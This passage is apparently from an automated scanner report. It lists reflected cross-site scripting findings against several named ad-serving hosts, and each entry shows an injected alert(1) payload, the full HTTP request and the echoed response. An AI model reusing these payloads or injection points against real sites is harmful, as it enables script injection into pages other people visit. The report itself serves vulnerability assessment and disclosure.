pf=W2lAvdO3UPK-67n93CR4V70h141EwRpVphJqTZeRapKuzdsXKOJykAJ3JxnPju9g5ehdKFP2wXAGuCUFv7XIPM0FzExGm1jv4Kvu640165OBvBXtoV0UQOpa27TXESVF-de5fP3AwoGiR_AIBPhToig1AM_gTSow1560pWbhh838I1Xi_FMkgIPwMPeBqodwgbWWL1_JBXWn8zgepH7BPbePalyqFZ93Lsfi8SgLVgTh-j-bH1npoySPlo-IWRvpNkaZBgGmnWJmvGYlVmPlSbHlSr1VTT1nlb50Fr5vj40NZDpqhun3lj0r0CvR0Vihm4m9vudXxCMFAjgeVFO5-xpIFGJioNw2vkEYe3YJ8emaUo3Hsp3jaymvGUlYuixmCOI3go4MrecUnPRzHm5YdxPKKY4kV-q2UJvSEkgnXksxeQb5A05wXSsD8Fj_F7za0NBQ4tKieMWx6gEN0MztGbK9Ye_wQX5bwuwz0ovjoTMcI4I2StnJ390lD_AvrOFoljQUjac8_W0UA2peA_VkfivKVPa-K620ApvhUtsRg48; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15018%7C15018%7C15018%7C15018%7Cundefined%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C14983%7C15018%7C15003; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 01:34:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:03 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2383879606519371855&fpid=4f3c3"><script>alert(1)</script>10dcb1064b2&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 32ead<script>alert(1)</script>edf430560af was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=190076932ead<script>alert(1)</script>edf430560af&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "190076932ead<script>alert(1)</script>edf430560af"

   
                                                           </head>
...[SNIP]...

3.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload aa72b--><script>alert(1)</script>56c01c56ac8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549aa72b--><script>alert(1)</script>56c01c56ac8&pid=1900769&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:00 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3234


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1483549aa72b--><script>alert(1)</script>56c01c56ac8" -->
...[SNIP]...

3.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 98ad8--><script>alert(1)</script>818648b6a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=1900769&ps=-198ad8--><script>alert(1)</script>818648b6a&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3667


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-198ad8--><script>alert(1)</script>818648b6a" -->
       <
...[SNIP]...

3.52. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 3feb5<script>alert(1)</script>2e70b7c5226 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0D346790CFB88D71D4593A30AB7CE8C9; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:37:09 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226".replace(/[^\w\d]/g,""),"YpffvxtzOKuYhLCm_405295693feb5<script>
...[SNIP]...

3.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea33"-alert(1)-"3b4b2d0d84c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1570312&9ea33"-alert(1)-"3b4b2d0d84c=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:34:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 02:34:56 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9ea33"-alert(1)-"3b4b2d0d84c=1&Z=300x250&s=1570312&_salt=2802567516";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

3.54. http://ads.specificmedia.com/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b714e'-alert(1)-'2181d872488 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:44 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 386
Expires: Sun, 13 Feb 2011 01:33:44 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc57b'-alert(1)-'40972d271a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:45 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 389
Expires: Sun, 13 Feb 2011 01:33:45 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ab782><script>alert(1)</script>6e76889d9da was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blankab782><script>alert(1)</script>6e76889d9da HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 321

<html><body><base target=_blankab782><script>alert(1)</script>6e76889d9da><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7
...[SNIP]...

3.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25c14"><script>alert(1)</script>a4b96fa0e6e was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e;adiframe=y">
...[SNIP]...

3.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b69b0"><script>alert(1)</script>eeb789feb65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 280

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank;adiframe=y">
...[SNIP]...

3.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 566fc><script>alert(1)</script>ed3badced5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&566fc><script>alert(1)</script>ed3badced5a=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

<html><body><base target=_blank&566fc><script>alert(1)</script>ed3badced5a=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C1
...[SNIP]...

3.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87299"><script>alert(1)</script>d8233ba9cbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 329

<html><body><base target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1;adiframe=y">
...[SNIP]...

3.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

